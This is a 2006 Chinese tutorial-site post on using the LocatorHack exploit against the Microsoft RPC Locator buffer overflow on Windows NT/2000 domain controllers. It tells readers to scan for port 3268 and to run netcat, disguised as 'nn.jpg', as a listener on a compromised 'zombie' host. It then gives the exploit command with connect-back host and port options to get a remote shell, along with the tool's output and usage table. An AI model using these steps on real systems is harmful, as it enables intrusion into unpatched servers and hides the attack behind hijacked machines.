rpc漏洞,rpc漏洞的利用

rpc漏洞的利用 - 网络安全 - 电脑教程网

rpc漏洞的利用

日期:2006-10-08   荐:
sunx出的那个程序成功率还不错 
没用过的去sunx.org下载吧 
简要说一下用法(给没用过的看的) 
首先拿superscan去扫3268端口,因为这是域控制器的标志 
这个漏洞只对域控制器有效 
扫到这样的机器以后,用nc在本地监听一个端口 
我是内网,只好在肉鸡上监听了 
下面是在肉鸡上~nn.jpg就是我放上去的nc 
218.0.0.0代表目标机 
123.123.123.123 代表开nc监听的肉鸡 
-------------- 
D:\WINNT\system32>nn.jpg -l -p 1111 
nn.jpg -l -p 1111 
---------------~~ 
然后在本地(ip不能说啊)参数大家自己查吧 
--------------- 
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx 
http://www.sunx.org 
for test only, dont used to hack,  

connect socket.... 
connect smb... 
open namedpipe... 
bind rpc... 
call rpc... 
Overflowed, 218.0.0.0:1111 ------???是不是弄错? 
good lUCk  
------------------ 
这时候肉鸡上就出现了对方的system32目录 
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> 

OS Version: 
winnt: 1 
win2k: 2 
winXP: 3 
OS Language: 
english: 1 
chinese: 2 
japanese: 3 


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 

-h 目标主机 
-v OS Version 2000就选2 
-l OS Language 按照上面的选择 
-s 选择所打的补丁 
-r 开nc的主机,可以是你自己也可以放在肉鸡上 
-p 用nc开的端口 
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. 

(出处:http://www.sheup.com)




标签: